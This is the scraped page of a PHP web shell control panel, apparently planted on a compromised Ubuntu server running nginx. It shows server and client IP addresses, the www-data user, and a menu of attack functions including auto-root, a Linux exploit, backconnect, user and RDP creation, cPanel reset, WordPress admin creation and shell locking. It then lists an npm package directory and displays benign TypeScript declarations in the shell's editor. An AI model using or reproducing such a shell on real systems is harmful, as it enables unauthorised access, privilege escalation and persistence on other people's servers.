Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
html-entities /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
995
B
-rw-rw-rw-
index.js
4.84
KB
-rw-rw-rw-
index.js.flow
1.06
KB
-rw-rw-rw-
index.js.map
3.83
KB
-rw-rw-rw-
named-references.js
73.09
KB
-rw-rw-rw-
named-references.js.map
43.98
KB
-rw-rw-rw-
numeric-unicode-map.js
389
B
-rw-rw-rw-
numeric-unicode-map.js.map
449
B
-rw-rw-rw-
surrogate-pairs.js
583
B
-rw-rw-rw-
surrogate-pairs.js.map
630
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
export declare type Level = 'xml' | 'html4' | 'html5' | 'all'; interface CommonOptions { level?: Level; } export declare type EncodeMode = 'specialChars' | 'nonAscii' | 'nonAsciiPrintable' | 'nonAsciiPrintableOnly' | 'extensive'; export interface EncodeOptions extends CommonOptions { mode?: EncodeMode; numeric?: 'decimal' | 'hexadecimal'; } export declare type DecodeScope = 'strict' | 'body' | 'attribute'; export interface DecodeOptions extends CommonOptions { scope?: DecodeScope; } /** Encodes all the necessary (specified by `level`) characters in the text */ export declare function encode(text: string | undefined | null, { mode, numeric, level }?: EncodeOptions): string; /** Decodes a single entity */ export declare function decodeEntity(entity: string | undefined | null, { level }?: CommonOptions): string; /** Decodes all entities in the text */ export declare function decode(text: string | undefined | null, { level, scope }?: DecodeOptions): string; export {};
Close